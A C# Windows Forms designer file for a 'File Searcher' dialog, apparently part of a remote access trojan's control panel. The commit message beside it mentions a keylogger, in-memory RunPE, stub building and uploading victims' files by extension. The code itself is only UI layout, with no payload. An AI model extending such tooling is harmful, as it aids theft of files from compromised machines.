fixed send to disk fixed keylogger [clipboard] #172 fixed installation added file searcher [to search and upload any file by it extension] updated plugin save method updated runpe send to memory minor improvements ```diff - You need to create a new stub from this version, and then use your old version to update all your clients, otherwise you won't be able to use the new plugins ```
145 lines
5.8 KiB
C#
145 lines
5.8 KiB
C#
namespace Server.Forms
|
|
{
|
|
partial class FormFileSearcher
|
|
{
|
|
/// <summary>
|
|
/// Required designer variable.
|
|
/// </summary>
|
|
private System.ComponentModel.IContainer components = null;
|
|
|
|
/// <summary>
|
|
/// Clean up any resources being used.
|
|
/// </summary>
|
|
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
|
|
protected override void Dispose(bool disposing)
|
|
{
|
|
if (disposing && (components != null))
|
|
{
|
|
components.Dispose();
|
|
}
|
|
base.Dispose(disposing);
|
|
}
|
|
|
|
#region Windows Form Designer generated code
|
|
|
|
/// <summary>
|
|
/// Required method for Designer support - do not modify
|
|
/// the contents of this method with the code editor.
|
|
/// </summary>
|
|
private void InitializeComponent()
|
|
{
|
|
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormFileSearcher));
|
|
this.label1 = new System.Windows.Forms.Label();
|
|
this.txtExtnsions = new System.Windows.Forms.TextBox();
|
|
this.btnOk = new System.Windows.Forms.Button();
|
|
this.label2 = new System.Windows.Forms.Label();
|
|
this.numericUpDown1 = new System.Windows.Forms.NumericUpDown();
|
|
this.label3 = new System.Windows.Forms.Label();
|
|
((System.ComponentModel.ISupportInitialize)(this.numericUpDown1)).BeginInit();
|
|
this.SuspendLayout();
|
|
//
|
|
// label1
|
|
//
|
|
this.label1.AutoSize = true;
|
|
this.label1.Location = new System.Drawing.Point(12, 39);
|
|
this.label1.Name = "label1";
|
|
this.label1.Size = new System.Drawing.Size(91, 20);
|
|
this.label1.TabIndex = 0;
|
|
this.label1.Text = "Extensions:";
|
|
//
|
|
// txtExtnsions
|
|
//
|
|
this.txtExtnsions.Location = new System.Drawing.Point(16, 71);
|
|
this.txtExtnsions.Name = "txtExtnsions";
|
|
this.txtExtnsions.Size = new System.Drawing.Size(547, 26);
|
|
this.txtExtnsions.TabIndex = 1;
|
|
this.txtExtnsions.Text = ".txt .pdf .doc";
|
|
//
|
|
// btnOk
|
|
//
|
|
this.btnOk.Location = new System.Drawing.Point(427, 129);
|
|
this.btnOk.Name = "btnOk";
|
|
this.btnOk.Size = new System.Drawing.Size(136, 49);
|
|
this.btnOk.TabIndex = 2;
|
|
this.btnOk.Text = "OK";
|
|
this.btnOk.UseVisualStyleBackColor = true;
|
|
this.btnOk.Click += new System.EventHandler(this.btnOk_Click);
|
|
//
|
|
// label2
|
|
//
|
|
this.label2.AutoSize = true;
|
|
this.label2.Location = new System.Drawing.Point(12, 120);
|
|
this.label2.Name = "label2";
|
|
this.label2.Size = new System.Drawing.Size(126, 20);
|
|
this.label2.TabIndex = 3;
|
|
this.label2.Text = "Max upload size:";
|
|
//
|
|
// numericUpDown1
|
|
//
|
|
this.numericUpDown1.Location = new System.Drawing.Point(16, 152);
|
|
this.numericUpDown1.Maximum = new decimal(new int[] {
|
|
200,
|
|
0,
|
|
0,
|
|
0});
|
|
this.numericUpDown1.Minimum = new decimal(new int[] {
|
|
1,
|
|
0,
|
|
0,
|
|
0});
|
|
this.numericUpDown1.Name = "numericUpDown1";
|
|
this.numericUpDown1.Size = new System.Drawing.Size(99, 26);
|
|
this.numericUpDown1.TabIndex = 5;
|
|
this.numericUpDown1.Value = new decimal(new int[] {
|
|
5,
|
|
0,
|
|
0,
|
|
0});
|
|
//
|
|
// label3
|
|
//
|
|
this.label3.AutoSize = true;
|
|
this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 7F);
|
|
this.label3.Location = new System.Drawing.Point(129, 156);
|
|
this.label3.Name = "label3";
|
|
this.label3.Size = new System.Drawing.Size(28, 17);
|
|
this.label3.TabIndex = 6;
|
|
this.label3.Text = "MB";
|
|
//
|
|
// FormFileSearcher
|
|
//
|
|
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
|
|
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
|
|
this.ClientSize = new System.Drawing.Size(575, 214);
|
|
this.Controls.Add(this.label3);
|
|
this.Controls.Add(this.numericUpDown1);
|
|
this.Controls.Add(this.label2);
|
|
this.Controls.Add(this.btnOk);
|
|
this.Controls.Add(this.txtExtnsions);
|
|
this.Controls.Add(this.label1);
|
|
this.DoubleBuffered = true;
|
|
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
|
|
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
|
|
this.MaximizeBox = false;
|
|
this.MinimizeBox = false;
|
|
this.Name = "FormFileSearcher";
|
|
this.ShowInTaskbar = false;
|
|
this.SizeGripStyle = System.Windows.Forms.SizeGripStyle.Hide;
|
|
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
|
|
this.Text = "File Searcher - Search and upload a file by it extension";
|
|
((System.ComponentModel.ISupportInitialize)(this.numericUpDown1)).EndInit();
|
|
this.ResumeLayout(false);
|
|
this.PerformLayout();
|
|
|
|
}
|
|
|
|
#endregion
|
|
|
|
private System.Windows.Forms.Label label1;
|
|
private System.Windows.Forms.Button btnOk;
|
|
private System.Windows.Forms.Label label2;
|
|
private System.Windows.Forms.Label label3;
|
|
public System.Windows.Forms.TextBox txtExtnsions;
|
|
public System.Windows.Forms.NumericUpDown numericUpDown1;
|
|
}
|
|
} |